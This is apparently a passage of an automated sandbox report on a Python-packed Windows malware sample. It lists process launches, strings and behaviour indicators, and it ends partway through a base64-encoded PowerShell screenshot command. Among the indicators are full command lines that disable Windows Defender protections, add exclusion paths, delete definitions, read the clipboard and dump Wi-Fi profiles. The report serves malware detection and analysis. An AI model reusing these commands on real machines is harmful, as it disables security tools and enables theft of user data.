              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D3141CC72_2_00007FF71D3141CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2F546872_2_00007FF71D2F5468
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2DD45872_2_00007FF71D2DD458
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2BA50472_2_00007FF71D2BA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D30832C72_2_00007FF71D30832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2E037472_2_00007FF71D2E0374
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2C236072_2_00007FF71D2C2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2DC3E072_2_00007FF71D2DC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: String function: 00007FF71D2C8444 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: String function: 00007FF71D2F49F4 appears 53 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: String function: 00007FF8E751E4D8 appears 79 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: String function: 00007FF7B10F2B10 appears 47 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: String function: 00007FF8E751E338 appears 50 times
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1330071281.00000162E1226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000000.1323604931.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQuickAssist.exej% vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324723670.00000162E1226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1329798498.00000162E1226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1325023146.00000162E1226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1329595963.00000162E1226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324098275.00000162E1226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1325594493.00000162E1226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1325471563.00000162E1226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324638401.00000162E1226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1323859878.00000162E1226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324345518.00000162E1226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324470480.00000162E1226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324838344.00000162E1226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1327152682.00000162E1226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776316870.00007FF8F0D18000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772678970.00007FF8E738D000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773198829.00007FF8E7504000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776819964.00007FF8F585C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1770691400.00007FF8E6E27000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1768907588.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQuickAssist.exej% vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1775764762.00007FF8F0953000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776987075.00007FF8F6DAC000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776611713.00007FF8F1E08000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1771472421.00007FF8E729B000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772036219.00007FF8E7353000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1777703826.00007FF8F9D77000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1775141445.00007FF8E7BBB000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773719902.00007FF8E756C000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773968980.00007FF8E75D2000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeBinary or memory string: OriginalFilenameQuickAssist.exej% vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: libcrypto-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9985088531464251
              Source: libssl-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9920135147270115
              Source: python311.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993315999451067
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9977988591269841
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9943153231216458
              Source: R9FJX.zip.72.drBinary or memory string: )x.sLnp4
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@144/56@2/2
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B10F8560 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF7B10F8560
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2CEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,72_2_00007FF71D2CEF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2FB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,72_2_00007FF71D2FB57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2D3144 GetDiskFreeSpaceExW,72_2_00007FF71D2D3144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8884:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8964:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9060:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8604:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:688:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8236:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9144:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6288:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8696:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8584:120:WilError_03
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeMutant created: \Sessions\1\BaseNamedObjects\z
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8380:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8640:120:WilError_03
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002Jump to behavior
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeReversingLabs: Detection: 57%
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeString found in binary or memory: id-cmc-addExtensions
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeString found in binary or memory: set-addPolicy
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwAC